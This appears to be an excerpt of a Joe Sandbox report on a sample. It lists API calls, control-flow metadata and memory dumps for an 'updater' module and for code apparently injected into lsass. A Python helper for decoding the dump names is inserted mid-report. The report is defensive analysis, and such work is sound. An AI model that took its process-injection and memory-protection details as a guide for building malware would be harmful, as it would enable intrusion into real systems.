7ff72af21394 malloc 3996->3997 3998 7ff72af2154e 3997->3998 3999 7ff72af21394 malloc 3998->3999 4000 7ff72af2155d 3999->4000 4001 7ff72af21394 malloc 4000->4001 4002 7ff72af2156c 4001->4002 4003 7ff72af21394 malloc 4002->4003 4004 7ff72af2157b 
4003->4004 4005 7ff72af21394 malloc 4004->4005 4006 7ff72af2158a 4005->4006 4007 7ff72af21394 malloc 4006->4007 4008 7ff72af21599 4007->4008 4009 7ff72af21394 malloc 4008->4009 4010 7ff72af215a8 4009->4010 4011 7ff72af21394 malloc 4010->4011 4012 7ff72af215b7 4011->4012 4013 7ff72af21394 malloc 4012->4013 4014 7ff72af215c6 4013->4014 4015 7ff72af21394 malloc 4014->4015 4016 7ff72af215d5 4015->4016 4017 7ff72af21394 malloc 4016->4017 4018 7ff72af215e4 4017->4018 4019 7ff72af21394 malloc 4018->4019 4020 7ff72af215f3 4019->4020 4020->3368 4022 7ff72af21394 malloc 4021->4022 4023 7ff72af215d5 4022->4023 4024 7ff72af21394 malloc 4023->4024 4025 7ff72af215e4 4024->4025 4026 7ff72af21394 malloc 4025->4026 4027 7ff72af215f3 4026->4027 4027->3369 4029 7ff72af21422 4028->4029 4030 7ff72af21394 malloc 4028->4030 4031 7ff72af21394 malloc 4029->4031 4030->4029 4032 7ff72af2142c 4031->4032 4033 7ff72af21431 4032->4033 4034 7ff72af21394 malloc 4032->4034 4035 7ff72af21394 malloc 4033->4035 4034->4033 4036 7ff72af2143b 4035->4036 4037 7ff72af21440 4036->4037 4038 7ff72af21394 malloc 4036->4038 4039 7ff72af21394 malloc 4037->4039 4038->4037 4040 7ff72af2144f 4039->4040 4041 7ff72af21394 malloc 4040->4041 4042 7ff72af2145e 4041->4042 4043 7ff72af21394 malloc 4042->4043 4044 7ff72af2146d 4043->4044 4045 7ff72af21394 malloc 4044->4045 4046 7ff72af2147c 4045->4046 4047 7ff72af21394 malloc 4046->4047 4048 7ff72af2148b 4047->4048 4049 7ff72af21394 malloc 4048->4049 4050 7ff72af2149a 4049->4050 4051 7ff72af21394 malloc 4050->4051 4052 7ff72af214a9 4051->4052 4053 7ff72af21394 malloc 4052->4053 4054 7ff72af214b8 4053->4054 4055 7ff72af21394 malloc 4054->4055 4056 7ff72af214c7 4055->4056 4057 7ff72af21394 malloc 4056->4057 4058 7ff72af214d6 4057->4058 4059 7ff72af21394 malloc 4058->4059 4060 7ff72af214e5 4059->4060 4061 7ff72af21394 malloc 4060->4061 4062 7ff72af214f4 4061->4062 4063 7ff72af21394 malloc 4062->4063 4064 7ff72af21503 4063->4064 4065 7ff72af21394 malloc 4064->4065 4066 
7ff72af21512 4065->4066 4067 7ff72af21394 malloc 4066->4067 4068 7ff72af21521 4067->4068 4069 7ff72af21530 4068->4069 4070 7ff72af21394 malloc 4068->4070 4071 7ff72af21394 malloc 4069->4071 4070->4069 4072 7ff72af2153a 4071->4072 4073 7ff72af21394 malloc 4072->4073 4074 7ff72af2153f 4073->4074 4075 7ff72af21394 malloc 4074->4075 4076 7ff72af2154e 4075->4076 4077 7ff72af21394 malloc 4076->4077 4078 7ff72af2155d 4077->4078 4079 7ff72af21394 malloc 4078->4079 4080 7ff72af2156c 4079->4080 4081 7ff72af21394 malloc 4080->4081 4082 7ff72af2157b 4081->4082 4083 7ff72af21394 malloc 4082->4083 4084 7ff72af2158a 4083->4084 4085 7ff72af21394 malloc 4084->4085 4086 7ff72af21599 4085->4086 4087 7ff72af21394 malloc 4086->4087 4088 7ff72af215a8 4087->4088 4089 7ff72af21394 malloc 4088->4089 4090 7ff72af215b7 4089->4090 4091 7ff72af21394 malloc 4090->4091 4092 7ff72af215c6 4091->4092 4093 7ff72af21394 malloc 4092->4093 4094 7ff72af215d5 4093->4094 4095 7ff72af21394 malloc 4094->4095 4096 7ff72af215e4 4095->4096 4097 7ff72af21394 malloc 4096->4097 4098 7ff72af215f3 4097->4098 4098->3417 4105 7ff72af22320 strlen 4106 7ff72af22337 4105->4106 4170 7ff72af21000 4171 7ff72af2108b __set_app_type 4170->4171 4172 7ff72af21040 4170->4172 4173 7ff72af210b6 4171->4173 4172->4171 4174 7ff72af210e5 4173->4174 4176 7ff72af21e00 4173->4176 4177 7ff72af28d40 __setusermatherr 4176->4177 4178 7ff72af21800 4179 7ff72af21812 4178->4179 4180 7ff72af21835 fprintf 4179->4180 4181 7ff72af22104 4182 7ff72af22218 4181->4182 4183 7ff72af22111 EnterCriticalSection 4181->4183 4184 7ff72af22272 4182->4184 4186 7ff72af22241 DeleteCriticalSection 4182->4186 4188 7ff72af22230 free 4182->4188 4185 7ff72af2220b LeaveCriticalSection 4183->4185 4189 7ff72af2212e 4183->4189 4185->4182 4186->4184 4187 7ff72af2214d TlsGetValue GetLastError 4187->4189 4188->4186 4188->4188 4189->4185 4189->4187 4115 7ff72af21ac3 4116 7ff72af21a70 4115->4116 4117 7ff72af2199e 4116->4117 4118 7ff72af21b36 4116->4118 4121 7ff72af21b53 
4116->4121 4119 7ff72af21a0f 4117->4119 4122 7ff72af219e9 VirtualProtect 4117->4122 4120 7ff72af21ba0 4 API calls 4118->4120 4120->4121 4122->4117 4154 7ff72af21e65 4155 7ff72af21e67 signal 4154->4155 4156 7ff72af21e7c 4155->4156 4158 7ff72af21e99 4155->4158 4157 7ff72af21e82 signal 4156->4157 4156->4158 4157->4158 4128 7ff72af22050 4129 7ff72af2205e EnterCriticalSection 4128->4129 4130 7ff72af220cf 4128->4130 4131 7ff72af220c2 LeaveCriticalSection 4129->4131 4132 7ff72af22079 4129->4132 4131->4130 4132->4131 4133 7ff72af220bd free 4132->4133 4133->4131 4134 7ff72af21fd0 4135 7ff72af22033 4134->4135 4136 7ff72af21fe4 4134->4136 4136->4135 4137 7ff72af21ffd EnterCriticalSection LeaveCriticalSection 4136->4137 4137->4135 4159 7ff72af21a70 4160 7ff72af2199e 4159->4160 4164 7ff72af21a7d 4159->4164 4161 7ff72af21a0f 4160->4161 4162 7ff72af219e9 VirtualProtect 4160->4162 4162->4160 4163 7ff72af21b53 4164->4159 4164->4163 4165 7ff72af21b36 4164->4165 4166 7ff72af21ba0 4 API calls 4165->4166 4166->4163 4190 7ff72af21e10 4191 7ff72af21e2f 4190->4191 4192 7ff72af21eb5 4191->4192 4193 7ff72af21ecc 4191->4193 4196 7ff72af21e55 4191->4196 4193->4192 4194 7ff72af21ed3 signal 4193->4194 4194->4192 4195 7ff72af21ee4 4194->4195 4195->4192 4197 7ff72af21eea signal 4195->4197 4196->4192 4198 7ff72af21f12 signal 4196->4198 4197->4192 4198->4192 4167 7ff72af2216f 4168 7ff72af22178 InitializeCriticalSection 4167->4168 4169 7ff72af22185 4167->4169 4168->4169 4107 7ff72af21ab3 4111 7ff72af21a70 4107->4111 4108 7ff72af2199e 4110 7ff72af21a0f 4108->4110 4113 7ff72af219e9 VirtualProtect 4108->4113 4109 7ff72af21b36 4112 7ff72af21ba0 4 API calls 4109->4112 4111->4107 4111->4108 4111->4109 4114 7ff72af21b53 4111->4114 4112->4114 4113->4108

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001C.00000002.2443890985.00007FF72AF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF72AF20000, based on PE: true
                                                                          • Associated: 0000001C.00000002.2443853890.00007FF72AF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                          • Associated: 0000001C.00000002.2443968858.00007FF72AF29000.00000002.00000001.01000000.0000000B.sdmp
                                                                          • Associated: 0000001C.00000002.2444024582.00007FF72AF2B000.00000004.00000001.01000000.0000000B.sdmp
                                                                          • Associated: 0000001C.00000002.2444683131.00007FF72B1DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_28_2_7ff72af20000_updater.jbxd
                                                                          Similarity
                                                                          • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                          • String ID:
                                                                          • API String ID: 2643109117-0
                                                                          • Opcode ID: c996e7a35bf803568ca43188fa743fd5e2d0011960c1ad381c257ca82b16660a
                                                                          • Instruction ID: e7b4a29f77c79d9115b85e5e0f305e084bffcd74e063cc3023abd2ed82ccb677
                                                                          • Opcode Fuzzy Hash: c996e7a35bf803568ca43188fa743fd5e2d0011960c1ad381c257ca82b16660a
                                                                          • Instruction Fuzzy Hash: 0B515731A0964786F710BB69ED903B9A3A4EF89794FC050B1C94D473A1DF3CE6458B28
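The "Memory Dump Source" names above carry the page protection of each dumped region, which is the quickest way to tell the executable .text dump from the read-only and read-write data dumps when pulling the updater module apart. The following is an added example, not code from the Joe Sandbox report or from the analysed sample: it parses those names and the snapshot file name, decodes the protection and region-type fields as Windows PAGE_* and MEM_* constants, and flags any region that is both writable and executable. The field layout is an assumption; only the PID (0x1C = 28) and round (2) are confirmed by the snapshot name hcaresult_28_2_7ff72af20000_updater.jbxd, and every function name here (parse_dump_name, parse_snapshot_name, dumps_match_snapshot, find_wx_regions, summarize) is mine.

```python
"""Decode Joe Sandbox memory-dump source identifiers.

Added example, not code from the Joe Sandbox report or from the analysed sample.
The report names each dump region like

    0000001C.00000002.2443890985.00007FF72AF21000.00000020.00000001.01000000.0000000B.sdmp

The field layout below is an ASSUMPTION, confirmed only in part by the page:
field 0 equals the PID in the snapshot name (hcaresult_28_...), field 1 the
round number (..._2_...), field 3 the region base; field 4 decodes cleanly as
a Windows PAGE_* protection constant and field 6 as a MEM_* region type.
Fields 2, 5 and 7 are kept raw and not interpreted.
"""
import re
from dataclasses import dataclass

# Windows memory protection constants (winnt.h).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_GUARD = 0x100
# MEMORY_BASIC_INFORMATION.Type values as returned by VirtualQuery.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

_DUMP_RE = re.compile(
    r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})\."
    r"([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$", re.I)
_SNAP_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9a-f]+)_(.+)\.jbxd$", re.I)


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    round_no: int
    base: int
    protect: int
    region_type: int
    raw_fields: tuple

    @property
    def protection_name(self) -> str:
        name = PAGE_PROTECTION.get(self.protect & 0xFF, f"0x{self.protect:x}")
        return name + ("|PAGE_GUARD" if self.protect & PAGE_GUARD else "")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.region_type, f"0x{self.region_type:x}")

    @property
    def is_executable(self) -> bool:
        return bool(self.protect & 0xF0)   # any PAGE_EXECUTE_* flag

    @property
    def is_writable(self) -> bool:
        return bool(self.protect & 0xCC)   # READWRITE, WRITECOPY and their EXECUTE_ variants


def parse_dump_name(name: str) -> DumpRegion:
    """Split one .sdmp name into its fields; raises ValueError on anything else."""
    m = _DUMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    f = m.groups()
    return DumpRegion(pid=int(f[0], 16), round_no=int(f[1], 16), base=int(f[3], 16),
                      protect=int(f[4], 16), region_type=int(f[6], 16), raw_fields=f)


def parse_snapshot_name(name: str) -> dict:
    """hcaresult_<pid>_<round>_<base>_<module>.jbxd -> its parts (pid and round are decimal)."""
    m = _SNAP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox snapshot name: {name!r}")
    return {"pid": int(m.group(1)), "round": int(m.group(2)),
            "base": int(m.group(3), 16), "module": m.group(4)}


def dumps_match_snapshot(dumps, snapshot) -> bool:
    """True when every dump comes from the snapshot's process and round and lies at or above its module base."""
    return all(d.pid == snapshot["pid"] and d.round_no == snapshot["round"]
               and d.base >= snapshot["base"] for d in dumps)


def find_wx_regions(dumps):
    """Regions that are both writable and executable: the first thing to inspect in an injector or miner dump."""
    return [d for d in dumps if d.is_executable and d.is_writable]


def summarize(dumps):
    return [(f"{d.base:016X}", d.protection_name, d.type_name) for d in dumps]


# Dump names copied from the report's "Memory Dump Source" block for the updater module.
REPORT_DUMPS = [
    "0000001C.00000002.2443890985.00007FF72AF21000.00000020.00000001.01000000.0000000B.sdmp",
    "0000001C.00000002.2443853890.00007FF72AF20000.00000002.00000001.01000000.0000000B.sdmp",
    "0000001C.00000002.2443968858.00007FF72AF29000.00000002.00000001.01000000.0000000B.sdmp",
    "0000001C.00000002.2444024582.00007FF72AF2B000.00000004.00000001.01000000.0000000B.sdmp",
    "0000001C.00000002.2444683131.00007FF72B1DF000.00000002.00000001.01000000.0000000B.sdmp",
]
REPORT_SNAPSHOT = "hcaresult_28_2_7ff72af20000_updater.jbxd"

if __name__ == "__main__":
    regions = [parse_dump_name(n) for n in REPORT_DUMPS]
    snap = parse_snapshot_name(REPORT_SNAPSHOT)
    print("consistent with snapshot:", dumps_match_snapshot(regions, snap))
    for row in summarize(regions):
        print(*row)
    print("W+X regions:", summarize(find_wx_regions(regions)))
```

Run against the five names from this report, the 00007FF72AF21000 dump decodes as PAGE_EXECUTE_READ / MEM_IMAGE (the code section holding the functions listed here), the dumps at 00007FF72AF20000, 00007FF72AF29000 and 00007FF72B1DF000 as PAGE_READONLY, and 00007FF72AF2B000 as PAGE_READWRITE; no region is writable and executable at once, so the memory-protection changes this module performs (the VirtualProtect call sites above) happen at run time rather than being visible in the static layout of the dumps.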

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001C.00000002.2443890985.00007FF72AF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF72AF20000, based on PE: true
                                                                          • Associated: 0000001C.00000002.2443853890.00007FF72AF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                          • Associated: 0000001C.00000002.2443968858.00007FF72AF29000.00000002.00000001.01000000.0000000B.sdmp
                                                                          • Associated: 0000001C.00000002.2444024582.00007FF72AF2B000.00000004.00000001.01000000.0000000B.sdmp
                                                                          • Associated: 0000001C.00000002.2444683131.00007FF72B1DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_28_2_7ff72af20000_updater.jbxd
                                                                          Similarity
                                                                          • API ID: memset$wcscatwcscpywcslen
                                                                          • String ID: $0$0$@$@
                                                                          • API String ID: 4263182637-1413854666
                                                                          • Opcode ID: 1ebfceb6ccbc61bfdc6d1d73518e072520c38c1920a0aba60a62dff29e637d97
                                                                          • Instruction ID: 62d990e6ac8d36f22e9b0b2a4253957d459964a79d5d5f1b51f462d7e6cad867
                                                                          • Opcode Fuzzy Hash: 1ebfceb6ccbc61bfdc6d1d73518e072520c38c1920a0aba60a62dff29e637d97
                                                                          • Instruction Fuzzy Hash: F7B19F6190C6C296F721AB18F8453AAF7A0FF91348F801275EA8C536A5DF7DD249CF50

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001C.00000002.2443890985.00007FF72AF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF72AF20000, based on PE: true
                                                                          • Associated: 0000001C.00000002.2443853890.00007FF72AF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                          • Associated: 0000001C.00000002.2443968858.00007FF72AF29000.00000002.00000001.01000000.0000000B.sdmp
                                                                          • Associated: 0000001C.00000002.2444024582.00007FF72AF2B000.00000004.00000001.01000000.0000000B.sdmp
                                                                          • Associated: 0000001C.00000002.2444683131.00007FF72B1DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_28_2_7ff72af20000_updater.jbxd
                                                                          Similarity
                                                                          • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                                          • String ID: 0$X$`
                                                                          • API String ID: 329590056-2527496196
                                                                          • Opcode ID: 8dd9b4d9794abecbbce3b974b874b08a77c89a1688d8793b7a9d9c155a3acde6
                                                                          • Instruction ID: 55ea07b4aa8551e0d5e40d18f80e182288c0e4c0f1d3f50816dbb91be030659c
                                                                          • Opcode Fuzzy Hash: 8dd9b4d9794abecbbce3b974b874b08a77c89a1688d8793b7a9d9c155a3acde6
                                                                          • Instruction Fuzzy Hash: 54028072908B8682F720AB19E8443AAB7A0FB85794F804375DAAC477E5DF3CD245CB54

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • VirtualQuery.KERNEL32(?,?,?,?,00007FF72AF2A694,00007FF72AF2A694,?,?,00007FF72AF20000,?,00007FF72AF21991), ref: 00007FF72AF21C63
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,00007FF72AF2A694,00007FF72AF2A694,?,?,00007FF72AF20000,?,00007FF72AF21991), ref: 00007FF72AF21CC7
                                                                          • memcpy.MSVCRT(?,?,?,?,00007FF72AF2A694,00007FF72AF2A694,?,?,00007FF72AF20000,?,00007FF72AF21991), ref: 00007FF72AF21CE0
                                                                          • GetLastError.KERNEL32(?,?,?,?,00007FF72AF2A694,00007FF72AF2A694,?,?,00007FF72AF20000,?,00007FF72AF21991), ref: 00007FF72AF21D23
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001C.00000002.2443890985.00007FF72AF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF72AF20000, based on PE: true
                                                                          • Associated: 0000001C.00000002.2443853890.00007FF72AF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                          • Associated: 0000001C.00000002.2443968858.00007FF72AF29000.00000002.00000001.01000000.0000000B.sdmp
                                                                          • Associated: 0000001C.00000002.2444024582.00007FF72AF2B000.00000004.00000001.01000000.0000000B.sdmp
                                                                          • Associated: 0000001C.00000002.2444683131.00007FF72B1DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_28_2_7ff72af20000_updater.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                          • API String ID: 2595394609-2123141913
                                                                          • Opcode ID: 8a554a6fa389011197ec1d316fb9bfbcb4cc07135e3b9ec9b47a0c356bf0b17d
                                                                          • Instruction ID: 141a803084e2bfbe80d792c0165ea482ccb509333279e557d1122bd5403dde7a
                                                                          • Opcode Fuzzy Hash: 8a554a6fa389011197ec1d316fb9bfbcb4cc07135e3b9ec9b47a0c356bf0b17d
                                                                          • Instruction Fuzzy Hash: 1B41C575A0864783FB10AB55EC406B9A760EF95BC4FD540B2CD4D437A1DE3CE689CB28

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001C.00000002.2443890985.00007FF72AF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF72AF20000, based on PE: true
• Associated: 0000001C.00000002.2443853890.00007FF72AF20000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001C.00000002.2443968858.00007FF72AF29000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001C.00000002.2444024582.00007FF72AF2B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001C.00000002.2444683131.00007FF72B1DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_28_2_7ff72af20000_updater.jbxd
                                                                          Similarity
                                                                          • API ID: memsetwcscatwcscpywcslen
                                                                          • String ID: $0$@
                                                                          • API String ID: 468205783-2347541974
                                                                          • Opcode ID: 659bee40769b99f3727e1d647f561d414f9a26e08f9d5cb18db75b3f823b1ed2
                                                                          • Instruction ID: c291306063df9ae3f1cdccfb251be4cdc114f349684664a7519f3cbfc462e500
                                                                          • Opcode Fuzzy Hash: 659bee40769b99f3727e1d647f561d414f9a26e08f9d5cb18db75b3f823b1ed2
                                                                          • Instruction Fuzzy Hash: B861606291C6C286F720AB18F8453ABF7A0EB95394F900275EA8C42AA5DF7DD245CF14

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001C.00000002.2443890985.00007FF72AF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF72AF20000, based on PE: true
• Associated: 0000001C.00000002.2443853890.00007FF72AF20000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001C.00000002.2443968858.00007FF72AF29000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001C.00000002.2444024582.00007FF72AF2B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001C.00000002.2444683131.00007FF72B1DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_28_2_7ff72af20000_updater.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                          • String ID:
                                                                          • API String ID: 3326252324-0
                                                                          • Opcode ID: b536a55527d214355ccdc22c4662103ecafd3a57f3d1ce3f70d4549eef9b577b
                                                                          • Instruction ID: c664a024e6741b5c717b1cd42b54da2a1e55f251c4f83b6f9883925e72483dda
                                                                          • Opcode Fuzzy Hash: b536a55527d214355ccdc22c4662103ecafd3a57f3d1ce3f70d4549eef9b577b
                                                                          • Instruction Fuzzy Hash: 2621F420A49A4393FB19BB05ED80738E360EF51B94FC401B1C90E476B0DF2DFA858B20

                                                                          Control-flow Graph

Control-flow graph for the function at 0x7ff72af21e10 (calls 0x7ff72af28d50 and signal); the rendered graph is not reproduced here.
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001C.00000002.2443890985.00007FF72AF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF72AF20000, based on PE: true
• Associated: 0000001C.00000002.2443853890.00007FF72AF20000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001C.00000002.2443968858.00007FF72AF29000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001C.00000002.2444024582.00007FF72AF2B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001C.00000002.2444683131.00007FF72B1DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_28_2_7ff72af20000_updater.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CCG
                                                                          • API String ID: 0-1584390748
                                                                          • Opcode ID: 81cc92ec2fa6e04c40e525b18e1cc1ff4a5f4b230223796d890c278b07bd10c2
                                                                          • Instruction ID: 7c35c1ac9ff6c9047349f380bb7f3f0b69e98b5396770db100ff47b12531985a
                                                                          • Opcode Fuzzy Hash: 81cc92ec2fa6e04c40e525b18e1cc1ff4a5f4b230223796d890c278b07bd10c2
                                                                          • Instruction Fuzzy Hash: 7221AE31E0954643FB7472189D9037A9181DF847A4FE485B1DE2D433E4DE2CEE898A6C

                                                                          Control-flow Graph

Control-flow graph for the function at 0x7ff72af21880 (calls 0x7ff72af22420, 0x7ff72af22660, 0x7ff72af21ba0, 0x7ff72af21d40 and VirtualProtect); the rendered graph is not reproduced here.
                                                                          APIs
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72AF21247), ref: 00007FF72AF219F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001C.00000002.2443890985.00007FF72AF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF72AF20000, based on PE: true
• Associated: 0000001C.00000002.2443853890.00007FF72AF20000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001C.00000002.2443968858.00007FF72AF29000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001C.00000002.2444024582.00007FF72AF2B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001C.00000002.2444683131.00007FF72B1DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_28_2_7ff72af20000_updater.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                          • API String ID: 544645111-395989641
                                                                          • Opcode ID: f55d23e6802c9323605da89ae8314c5a5c300cb13031396fec444b8fb4cb03df
                                                                          • Instruction ID: bfac6cfdfc8c26389d4059d5f0efc5962f16ab27a48e0a8a206f365e0c887452
                                                                          • Opcode Fuzzy Hash: f55d23e6802c9323605da89ae8314c5a5c300cb13031396fec444b8fb4cb03df
                                                                          • Instruction Fuzzy Hash: 18513C32E48546D7FB10AB25EC407B8B761EB15B98F844171D91C077A4CA3CEA9ACF28

                                                                          Control-flow Graph

Control-flow graph for the function at 0x7ff72af21800 (calls 0x7ff72af22290 and fprintf); the rendered graph is not reproduced here.
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001C.00000002.2443890985.00007FF72AF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF72AF20000, based on PE: true
• Associated: 0000001C.00000002.2443853890.00007FF72AF20000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001C.00000002.2443968858.00007FF72AF29000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001C.00000002.2444024582.00007FF72AF2B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001C.00000002.2444683131.00007FF72B1DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_28_2_7ff72af20000_updater.jbxd
                                                                          Similarity
                                                                          • API ID: fprintf
                                                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                          • API String ID: 383729395-3474627141
                                                                          • Opcode ID: 6dc62383441ec21015d1a93eb8b73b3a2626f1b89f937b38c1cf0d1080ec3dd9
                                                                          • Instruction ID: 4c4efa94e8fa5ea027618983b2c4cc91207d35402f8223732b2e5ca8a93e5e2b
                                                                          • Opcode Fuzzy Hash: 6dc62383441ec21015d1a93eb8b73b3a2626f1b89f937b38c1cf0d1080ec3dd9
                                                                          • Instruction Fuzzy Hash: 1EF0C221E08A8583F721BB35AD810BDE361EB593C0FD09271DE4D53251DF2CE2828B10

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001C.00000002.2443890985.00007FF72AF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF72AF20000, based on PE: true
• Associated: 0000001C.00000002.2443853890.00007FF72AF20000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001C.00000002.2443968858.00007FF72AF29000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001C.00000002.2444024582.00007FF72AF2B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001C.00000002.2444683131.00007FF72B1DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_28_2_7ff72af20000_updater.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                          • String ID:
                                                                          • API String ID: 682475483-0
                                                                          • Opcode ID: d38a7a66502803ee60ea24eddf2a71f1e95afdba96137525794505a2f4712398
                                                                          • Instruction ID: 248b4b24ea7c9033a91c418552e7ed4224e3cd950cba69bf34c464fa56714964
                                                                          • Opcode Fuzzy Hash: d38a7a66502803ee60ea24eddf2a71f1e95afdba96137525794505a2f4712398
                                                                          • Instruction Fuzzy Hash: 8501D625A0964393F755BB15AE44678E260FF05B94FC500B1CE0D53AA4DF2DEA958A20

                                                                          Execution Graph

                                                                          Execution Coverage:0.9%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:131
                                                                          Total number of Limit Nodes:10
Execution graph (rendered graph not reproduced). Entry nodes at 0x140adfc273c (LoadLibraryA) and in the 0x140ae86xxxx region; APIs reached from these nodes: GetProcessHeap, StrCmpNIW, StrCmpIW, StrCmpW, lstrlenW, StrCpyW, StrCatW, PathCombineW, Sleep, SleepEx, RegOpenKeyExW, RegQueryInfoKeyW, RegEnumValueW, RegCloseKey, GetFileType, GetFinalPathNameByHandleW. Internal helpers referenced by the graph: __free_lconv_mon, _invalid_parameter_noinfo.

                                                                          Control-flow Graph

Control-flow graph for the function at 0x140ae86253c (calls 0x140ae882cc0, 0x140ae868c60, 0x140ae861a40, 0x140ae8630a8, 0x140ae863844, 0x140ae863044, 0x140ae861cac, GetFileType and StrCpyW); the rendered graph is not reproduced here.
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
